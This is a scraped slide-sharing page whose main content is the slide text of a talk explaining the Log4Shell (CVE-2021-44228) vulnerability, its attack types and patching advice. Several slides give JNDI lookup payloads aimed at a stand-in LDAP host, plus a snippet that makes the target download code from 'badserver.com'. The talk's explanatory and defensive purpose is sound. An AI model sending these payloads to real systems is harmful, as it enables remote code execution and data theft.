Agile Tour London 2018: DASHBOARDS AND CULTURE – HOW OPENNESS CHANGES YOUR BE...
 
Beyond the Pi: What’s Next for the Hacker in All of Us?
Beyond the Pi: What’s Next for the Hacker in All of Us?Beyond the Pi: What’s Next for the Hacker in All of Us?
Beyond the Pi: What’s Next for the Hacker in All of Us?
 
A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization A Modern Fairy Tale: Java Serialization
A Modern Fairy Tale: Java Serialization
 
Eclipse OpenJ9 - SpringOne 2018 Lightning talk
Eclipse OpenJ9 - SpringOne 2018 Lightning talkEclipse OpenJ9 - SpringOne 2018 Lightning talk
Eclipse OpenJ9 - SpringOne 2018 Lightning talk
 
SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...
SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...
SkillsMatter June 2018: Java in the 21st Century: Are You Thinking Far Enough...
 

Recently uploaded

Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 

Recently uploaded (20)

Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 

Log4Shell - Armageddon or Opportunity.pptx

  • 1. Log4Shell - Armageddon or Opportunity Steve Poole @spoole167
  • 2. 9th December - a normal day at the office
  • 8. Log4Shell may be the worst ever vulnerability
  • 9. It just keeps on giving
  • 10. Log4J vulnerability - the wrong thing at the wrong time, for a long time Log4J CVE-2021-44228 - Fixes a problem that’s been around since 2014
  • 11. Today The basics behind most Java exploits The mechanics of a Log4JShell exploit A Log4Shell demo Breaking down the attack types : risk, reward, detection, applicability Prevention / related tools Larger consequences - why the White House got involved Wake up call - understanding that fire-drills are here to stay. Revisiting your supply chains Wrap up
  • 12. The basics behind most Java exploits Main Objective Arbitrary Remote code execution. Bad Actors can do whatever they want Steal data, change data, add malware … Use Java serialization or text-to-execution vehicles (from xml tags to scripting languages to text formatters) Leave no trace Secondary Objective Leak, change, insert data. Secrets, configs, device info etc Gadget chains, human error, limited ability to manipulate config data
  • 13. The basics behind most Java exploits Attacks come from relentless scripted botnets using sophisticated tools to probe end points Imagine a burglar, trying every door and window, in every building on the planet every moment of the day and night
  • 14. Reverse Engineering Fuzzing calls and data.. GET /users/1 POST /users/2 PUT /users/20000?name=“(select GET /users/-1
  • 16. Fuzzing calls and data. Reverse Engineering Fuzz urls, json payloads, xml payloads, binary payloads … Import / export / upload / download options .. Command line options, file formats … “known-to-be-dangerous” values In the public domain Widespread & mature Automatic ‘protocol’ detection & exploitation
  • 17. Log4Shell is a gift to the bad actors. It’s been there since 2014
  • 18. Log4J - the exploited mechanics Probably every Java developer has or is using Log4J. Somewhere in the code will be a couple of imports and a field import org.slf4j.Logger; import org.slf4j.LoggerFactory; Logger logger = LoggerFactory.getLogger(<Class>.class); Then throughout the code will be various calls to the logger to record data : logger.info(“Entering application”); logger.debug(“device id {}”,id); logger.info(“X-Header {}”,headers[‘X-Header’]);
  • 19. Log4J - the exploited mechanics Then the log might have 2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application 2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ 2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa
  • 20. Log4J - the exploited mechanics 2022-01-01 09:07:41,508 [main] INFO MyApp - Entering application 2022-01-01 09:07:41,518 [main] DEBUG device id Z12345QWAZ 2022-01-01 09:07:41,528 [main] INFO X-Header aa-45-56-30-fa logger.info(“Entering application”); logger.debug(“device id {}”,id); logger.info(“X-Header {}”,headers[‘X-Header’]); Since log4J is a debugging tool its important record input data asis
  • 21. If the application or component is used in different environments then recording basic info in the log would be good! But Log4J makes it even easier for you Log4J - the exploited mechanics logger.info(“version {}”,System.getProperties(“java.version”); logger.info(“version ${sys:java.version}”); 022-01-01 09:07:41,508 [main] INFO MyApp - version 1.17.1
  • 22. These substitution parameters or ‘lookups” provide convenience and robustness. ${sys:<system-property-name>} ${env:<environmental-name>} ${log4j:configLocation} Log4J - the exploited mechanics
  • 23. User-Agent: Mozilla/5.0 Put together the expectation to log input data asis + lookups Log4J - the exploited mechanics log.info(“User Agent: {}”,userAgent); 2022-01-01 09:07:41 [main] INFO User Agent: Mozilla/5.0 User-Agent: ${sys:java.version} log.info(“User Agent: {}”,userAgent); 2022-01-01 09:07:41 [main] INFO User Agent: 1.8.0
  • 24. Log4J - the exploited mechanics We’re not finished yet. In 2014 a new Lookup was added for JNDI to allow logging of service configuration info in a consistent way. No different from the other lookups. However..
  • 25. Log4J - the exploited mechanics We’re not finished yet. In 2014 a new Lookup was added for JNDI to allow logging of service configuration info in a consistent way. No different from the other lookups. However.. The lookup also enabled other registered JNDI services to be used. Ldap, RMI, DNS …
  • 26. Log4J - the exploited mechanics One more thing. For most Log4J versions processing substitution parameters is recursive: ${sys:<system-property- name>} Envvar MODE=”${sys.java.version}” Log: log.info(“${env:MODE}”) Result “1.8.1” etc
  • 27. Log4J - the exploited mechanics Situation: Over powerful Log4J lookups and substitution process coupled with a desire to write input data asis Result: field day for bad actors Within 4 days half of all global corporate networks globally had been actively probed, with over 60 variants of the exploit
  • 28. Let’s see it in action
  • 29. What you saw Exposing environment data Transmitting environment data Running a gadget chain Arbitrary Remote Code Execution A simple hidden attack
  • 30. Exposing environmental data Concept: Impact: At risk: Can the bad actor force sensitive data to appear in the log? Low as a standalone attack. No immediate feedback High if logs are visible ( compromised server, log aggregators) java version, classpath, properties that are publicly known,can be guessed (see fuzzing) ${sys:java.version}
  • 31. Aside - logs are more vulnerable than you might imagine Sometimes logs (and other files) are accessible externally
  • 32. Aside - logs are more vulnerable than you might imagine Easily found via
  • 33. Aside - logs are more vulnerable than you might imagine useful search terms exploit-db.com
  • 34. Transmitting environmental data Concept: Impact: At risk: Can the bad actor send sensitive data to another server? Medium to High. IP info is leaked at a minimum High if recursive substitution available java version, classpath, properties that are publicly known,can be guessed (see fuzzing) ${jndi:ldap://ldap.dev:1389/cn=version}
  • 36. Running a gadget chain Concept: Impact: At risk: Can the bad actor cause code to execute under their control? High to Very High. Java Gadget chains are complicated but easily constructed. Arbitrary RCEs are possible Everything. Access to data, systems etc. ${jndi:ldap://ldap.dev:1389/cn=gadget}
  • 37. A simple gadget chain HashMap m = new HashMap<>(); m.put("key is $${sys:java.version}", "${sys:java.version}"); List<String> list = new LinkedList<>(); list.add("this"); list.add("is"); list.add("a"); list.add("nested"); list.add("list"); m.put("gadget-chain", list); ${jndi:ldap://ldap.dev:1389/cn=gadget} This call expects a serialized Java object stream to be retuned
  • 38. Various results 2.0 - 2.3 2.4- 2.5 add todo(title=${jndi:ldap://ldap.dev:1389/cn=gadget}, status=ACTIVE) 2.3.1, 2.3.2 2.15-2.17.1 add todo(title={gadget-chain=[this, is, a, nested, list], key is 1.8.0_102=1.8.0_102}, status=ACTIVE) 2.6-2.14.1
  • 39. Running a gadget chain to cause a DoS Concept: Impact: At risk: Can the bad actor cause code to crash an application High to Very High. Easy to achieve. Availability. Leads to Ransom threats ${jndi:ldap://ldap.dev:1389/cn=boom}
  • 40. A simple DOS gadget chain Object[][] o=new Object[][]{ new Object[0]}; Use serialization tools to turn it into Object[][] o= new Object[INT_MAX][INT_MAX] // not real java OOM every time? ${jndi:ldap://ldap.dev:1389/cn=boom} This call expects a serialized Java object stream to be retuned
  • 41. Arbitrary Remote Code Execution For some versions of Log4J we’re lucky. The RCE fails unintentionally This got “fixed” Casting (String) replaced with a toString():
  • 42. Arbitrary Remote Code Execution Reference ref = new Reference("ExternalObject", "ExternalObject", “http://badserver.com/code/"); If the returned object is one of these ${jndi:ldap://ldap.dev:1389/cn=rce} This call makes log4J go to the badserver and downloads …
  • 43. Arbitrary Remote Code Execution One of these ${jndi:ldap://ldap.dev:1389/cn=rce} public class ExternalObject implements javax.naming.spi.ObjectFactory
  • 44. Arbitrary Remote Code Execution One of these ${jndi:ldap://ldap.dev:1389/cn=rce} public class ExternalObject implements javax.naming.spi.ObjectFactory public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception With this method
  • 45. Arbitrary Remote Code Execution One of these ${jndi:ldap://ldap.dev:1389/cn=rce} public class ExternalObject implements javax.naming.spi.ObjectFactory public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception With this method method get executed in the application and any required code is downloaded from the bad server
  • 46. Arbitrary Remote Code Execution Various results: older Java versions 2.0 - 2.3 , 2.4-2.12.1, 2.13.0-2.14.1 2.3.1,2.3.2, 2.12.2-2.12.14, 2.15+
  • 47. Arbitrary Remote Code Execution Various results: Java 17+
  • 48. Hidden attacks ${jndi:ldap://ldap.dev:1389/a} Take the RCE attack and spin it slightly. Ensure the last object returned is a String
  • 49. Hidden attacks ${jndi:ldap://ldap.dev:1389/a} Although the JNDI defaults to trust remote were changed in Java. they can still be turned on. Especially vulnerable is tools that launch processes com.sun.jndi.ldap.object.trustURLCodebase com.sun.jndi.ldap.object.trustSerialData
  • 50. Log4Shell is deadly Move to the latest version of Log4J Move to the latest version of Java you can Re evaluate your scanning checking tools. Many do not do a good job!! Also look for fatjars with log4j code
  • 51. We’re not doing a good Job patching https://www.sonatype.com/resource s/log4j-vulnerability-resource-center
  • 52. The last bits Larger consequences - why the White House got involved Wake up call - understanding that fire-drills are here to stay. Revisiting your supply chains